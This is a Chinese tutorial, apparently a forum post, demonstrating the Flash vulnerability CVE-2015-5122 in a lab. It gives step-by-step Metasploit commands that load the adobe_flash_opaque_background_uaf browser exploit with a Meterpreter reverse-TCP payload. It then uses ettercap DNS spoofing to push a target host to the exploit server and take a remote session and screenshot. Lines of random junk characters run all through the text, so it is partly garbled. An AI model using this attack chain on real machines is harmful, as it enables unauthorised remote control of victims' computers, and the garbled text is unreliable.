4 n/ B# a; D* T$ l2 _
二、cve2015-5122漏洞实例演示虚拟机 ) T! R$ o1 ]3 M0 t( o
- [9 g4 U: [: _% X4 T$ R
; F3 w! z- u& r1 j5 I 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 9 f9 j1 ^; K }6 W" I6 j
- m E+ r2 R! F6 T/ O! `
* \0 C, j/ {# ]0 g- T8 o$ ? search cve-2015-5122如图:
- K9 ]- {) c4 {# m 9 i* L$ O/ |+ w! I% Q+ [- Q' r- f
: g9 V# V7 ^" V5 |. N
) F7 u" l) Q; t6 C- o; z6 _ $ ~ m0 s# @3 I- U8 s
3 i0 A$ {* d* q! b( G/ C6 P7 M2 s' J 下面我们敲如下命令:
/ @! K2 D$ s& V. m 4 W# M8 S! V) Y; s; }! r& P
/ D; P6 O' t: E: Q0 \! _
use exploit/multi/browser/adobe_flash_opaque_background_uaf
7 B* J+ X8 t0 V4 e, N9 [& u / K* E7 l! s' } S; k$ X
0 { @) k( S9 t; v# q+ P! ~ set PAYLOAD windows/meterpreter/reverse_tcp
1 ^0 S9 G8 h) ^6 c 8 [5 d6 D' |: P, x* `1 n
( O* q9 _( ?* \- v8 q
set LHOST 192.168.0.109
0 I. _/ c5 G9 X* e7 d p8 { s 9 U% N2 l( O" N
" }" U8 d' X( q h3 U9 h set URIPATH / /*根目录*/ ! {6 a% Q0 u. F8 b2 J
$ }1 R# b4 j T. j0 h+ C, t& k/ U
+ ^, R d9 w9 C* W set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
2 D" }2 a+ ?3 _9 a' C5 b+ C
% d& R7 }0 r" p" Y& U% U8 A% K4 F- F
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
; s/ }( p" p# F, [; D - Z- z; X" M, n' n: C. L |4 n7 a4 C
, J# Z0 m9 i3 M/ `* F 然后show options如图:
* f* j3 x! W! `/ p% b: ^5 P- T+ w
% H5 ]# W4 p/ v% u" r# I
- f; C% p" y% M) Z: t( ] 5 N+ X3 ?- @8 P
i! {9 m/ S1 C! r* i* ?
7 g' Q* H% o. g7 M 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
0 d% I/ }( C1 l0 Z& ]
6 h7 u' a/ J2 e% @: d9 i2 Y( ~7 y
* n& S5 S p5 r: Q. W; ]
! \: \! B- Q# c1 z% ?7 Z7 j 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 g9 W6 P! H4 ~: z- f# R1 ^, v1 e
7 a* o! M4 W8 t. }! b
1 h1 |/ h- m, R% a% u% o0 m& E Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
- w6 L4 o5 A2 Z. p : W' E9 F1 i8 F- \
. m9 R4 D# N+ X: g* r# f$ M
4 d( |. o0 P1 R" P7 X ; \# d* ^8 b |3 _# R& d
+ H& d& ~, U7 S5 k! G3 Y0 E 成功了,这时候我们断开ettercap,如图: & Y* j; J% q9 P+ p
9 ^! j/ ^7 ^8 }$ G3 n
$ |, P7 |, h& D2 Q' G ' P5 {5 r4 E; X5 r9 o
; m I9 q, T2 }( J6 Q
0 k' m, U- p. k% j: \8 r& i
Screenshot如图: 1 o6 N1 R5 u. ]/ U$ i' U
" N( @2 o# L3 {" D+ w
N3 U1 I' L( ?( u
5 R: y; ?- {+ q5 n% M" h+ P
% C7 n6 d5 M Y! e* \8 P- O
+ @' |: ^- l2 G2 n8 V7 a3 a, d, s
( L/ u6 ?1 s6 w" }1 v
|